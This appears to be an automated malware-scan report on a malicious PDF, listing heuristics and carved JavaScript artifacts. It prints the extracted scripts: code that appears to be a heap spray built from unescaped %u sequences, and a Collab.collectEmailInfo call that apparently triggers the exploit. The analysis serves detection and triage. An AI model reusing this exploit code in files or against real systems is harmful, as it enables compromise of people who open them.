Verdict: MALICIOUS
Risk Score: 148
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_UNESCAPE'. The JavaScript is likely intended to be executed upon opening the PDF, potentially to download and execute a second-stage payload. The presence of obfuscated scripts and a long encoded blob further supports this. The exact behavior of the script is not fully discernible due to obfuscation, leading to a moderate confidence level.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (4)
- JavaScript action (low; 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: return unescape(cmjny);
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj111111_000.js | pdf-javascript-stream | PDF /JS object 111111 at offset 0x160 | 2249 bytes |
| javascript_obj111112_001.js | pdf-javascript-stream | PDF /JS object 111112 at offset 0x569 | 66 bytes |

Artifact: javascript_obj111111_000.js
SHA-256: 2795e016e56758673690f68960b9154ee917c1148b6f2440660d044bc03c0cb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
function apera(cmjny)
{
return unescape(cmjny);
}
var fskoi = new Array();
var fvhodo = 'ARG0c0cARG0c0c'.replace(/ARG/igm,'%u');
var izapbs = 'ARG9090ARG9090'.replace(/ARG/igm,'%u');
var kogqa = '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'.replace(/Z/igm,'%u').replace(/X/igm,'0');
fvhodo=apera(fvhodo);
izapbs=apera(izapbs);
kogqa=apera(kogqa);
while (izapbs.length * 2 < 0x3fffc8-kogqa.length * 2){izapbs += izapbs;}
izapbs = izapbs.substr(0, (0x3fffc8-kogqa.length * 2) / 2);
for (var xrjng = 0; xrjng < 47; xrjng ++ ){fskoi[xrjng] = izapbs + kogqa;}
while (fvhodo.length < 44952){fvhodo += fvhodo;}

Artifact: javascript_obj111112_001.js
SHA-256: d4267e7b3b627634461a9847f764ad3b18a5d30340bb0262a45574fc9d9d4783
Preview script (first 1,000 lines of the extracted script)
this.collabStore = Collab.collectEmailInfo({subj:"", msg:fvhodo});